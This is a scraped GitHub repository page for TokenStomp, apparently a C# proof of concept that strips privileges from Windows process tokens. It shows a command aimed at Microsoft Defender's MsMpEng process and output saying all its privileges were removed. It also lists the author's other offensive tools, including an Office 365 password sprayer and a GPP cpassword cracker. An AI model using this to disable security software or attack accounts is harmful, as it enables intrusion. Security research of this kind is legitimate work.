MartinIngesen/TokenStomp MartinIngesen/TokenStomp

  • Stars
    star
    138
  • Rank 263,620 (Top 6 %)
  • Language
    C#
  • Created over 2 years ago
  • Updated over 2 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
MartinIngesen/TokenStomp
github

MartinIngesen

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

C# implementation of the token privilege removal flaw discovered by @GabrielLandau/Elastic

TokenStomp

C# POC for the token privilege removal flaw reported by @GabrielLandau at Elastic.

C:\Users\Mrtn>TokenStomp.exe MsMpEng

  ________           β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„   β–„ β–„β–„β–„β–„β–„β–„β–„ β–„β–„    β–„ β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„ β–„β–„   β–„β–„ β–„β–„β–„β–„β–„β–„β–„
 (____ / <|         β–ˆ       β–ˆ       β–ˆ   β–ˆ β–ˆ β–ˆ       β–ˆ  β–ˆ  β–ˆ β–ˆ       β–ˆ       β–ˆ       β–ˆ  β–ˆβ–„β–ˆ  β–ˆ       β–ˆ
 (___ /  <|         β–ˆβ–„     β–„β–ˆ   β–„   β–ˆ   β–ˆβ–„β–ˆ β–ˆ    β–„β–„β–„β–ˆ   β–ˆβ–„β–ˆ β–ˆ  β–„β–„β–„β–„β–„β–ˆβ–„     β–„β–ˆ   β–„   β–ˆ   β–ˆ   β–ˆ    β–„  β–ˆ
 (__ /   <`-------.   β–ˆ   β–ˆ β–ˆ  β–ˆ β–ˆ  β–ˆ      β–„β–ˆ   β–ˆβ–„β–„β–„β–ˆ       β–ˆ β–ˆβ–„β–„β–„β–„β–„  β–ˆ   β–ˆ β–ˆ  β–ˆ β–ˆ  β–ˆ       β–ˆ   β–ˆβ–„β–ˆ β–ˆ
 /  `.    ^^^^^ |  \  β–ˆ   β–ˆ β–ˆ  β–ˆβ–„β–ˆ  β–ˆ     β–ˆβ–„β–ˆ    β–„β–„β–„β–ˆ  β–„    β–ˆβ–„β–„β–„β–„β–„  β–ˆ β–ˆ   β–ˆ β–ˆ  β–ˆβ–„β–ˆ  β–ˆ  β–„ β–„  β–ˆ    β–„β–„β–„β–ˆ
|     \---------'   | β–ˆ   β–ˆ β–ˆ       β–ˆ    β–„  β–ˆ   β–ˆβ–„β–„β–„β–ˆ β–ˆ β–ˆ   β–ˆβ–„β–„β–„β–„β–„β–ˆ β–ˆ β–ˆ   β–ˆ β–ˆ       β–ˆ β–ˆβ–ˆβ–„β–ˆβ–ˆ β–ˆ   β–ˆ
|______|___________/] β–ˆβ–„β–„β–„β–ˆ β–ˆβ–„β–„β–„β–„β–„β–„β–„β–ˆβ–„β–„β–„β–ˆ β–ˆβ–„β–ˆβ–„β–„β–„β–„β–„β–„β–„β–ˆβ–„β–ˆ  β–ˆβ–„β–„β–ˆβ–„β–„β–„β–„β–„β–„β–„β–ˆ β–ˆβ–„β–„β–„β–ˆ β–ˆβ–„β–„β–„β–„β–„β–„β–„β–ˆβ–„β–ˆ   β–ˆβ–„β–ˆβ–„β–„β–„β–ˆ
[β–„β–„β–„β–„β–„|`-.β–„β–„β–„β–„β–„β–„β–„β–„β–„]               Implemented by @Mrtn9 - Technique by @GabrielLandau

[*] Found MsMpEng with pid 4988
[*] Got handle to process
[*] Successfully opened process token
[*] Got token information
[*] Found 14 privileges in token
[*] Successfully removed 14 of 14 privileges from token
[*] Successfully set token untrusted

C:\Users\Mrtn>

Proof of Concept screenshot

Credits

More Repositories

1

MSOLSpray

A Python implementation of dafthack's MSOLSpray. A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
Python
80
star
2

HonnyPotter

WordPress Honeypot
PHP
28
star
3

gpocrack

Active Directory Group Policy Preferences cpassword cracker/decrypter.
Python
22
star
4

AntiPluss

Chrome Extension for reading all of the paywalled Amedia publications online
JavaScript
6
star
5

Sub

A fast CLI for downloading subtitles via Subscene
Java
4
star
6

APTify

APTify your documents!
Python
3
star
7

Pikalang

JavaScript
2
star
8

BubbleBabble

Bubble Babble implemented in JS
HTML
1
star
9

blocklistbuilder

DNS blocklist builder
Shell
1
star
10

WebWatcher

Python
1
star
11

martiningesen.github.io

JavaScript
1
star